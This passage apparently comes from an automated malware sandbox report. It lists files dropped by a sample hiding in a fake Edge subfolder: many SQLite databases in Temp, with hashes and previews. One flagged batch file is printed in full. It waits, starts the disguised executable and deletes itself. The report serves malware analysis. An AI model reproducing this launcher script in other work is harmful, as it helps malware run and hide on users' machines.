                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\HORXYMbFCe

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\HVJFikDMHQ

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\Hx1kp9ZbET

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\I23EozvCsp

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\IKln6QMVEN

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\IXPMPf49mk

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):98304
                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\ItC6u6iT7A

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\IwVYKuUo8o

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\IwtwfnHPYz

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\Ixcm1QdxyZ

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\JK5eNJA4tm

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\Jy8UMgCbf3

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\K4j3eQi6kx

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat

                                                                                                                      Download File
                                                                                                                      Process:C:\ChainagentComponent\ChainFontruntimeCrt.exe
                                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):236
                                                                                                                      Entropy (8bit):5.427981583263844
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:hCRLuVFOOr+DER5I3uTckBhp2egb4jJGkrYyKOZG1wkn23fvtztO:CuVEOCDEfTzuegM3ZfdztO
                                                                                                                      MD5:2BDBD831DB735879CACCEA8A2A174D2A
                                                                                                                      SHA1:0C5009BC8DF8A7041601AE80ECD80BD002EFF66F
                                                                                                                      SHA-256:83FF6510B9A0B5EB507F156CDECBFEA79844C8381501FED08C7CA675FD63CA78
                                                                                                                      SHA-512:82E2878308BD768A0CC11CC714C9FA9EB359F2FC5BBE7AF04B503A960F102674271F880153EAA4DE0C362FE478C37D708EC7B5211763C92816E9BE174895206D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KC0FFSqemJ.bat"

                                                                                                                      C:\Users\user\AppData\Local\Temp\KoY5DSUKUp

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):28672
                                                                                                                      Entropy (8bit):2.5793180405395284
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\KxTBIJ1yoA

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\KzD0rGsyY6

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):98304
                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\LA48O0ognI

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):106496
                                                                                                                      Entropy (8bit):1.1358696453229276
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\LSFlfqGJR1

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\LnTpUZc90s

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5712781801655107
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\M3sWmCwOBS

                                                                                                                      Download File
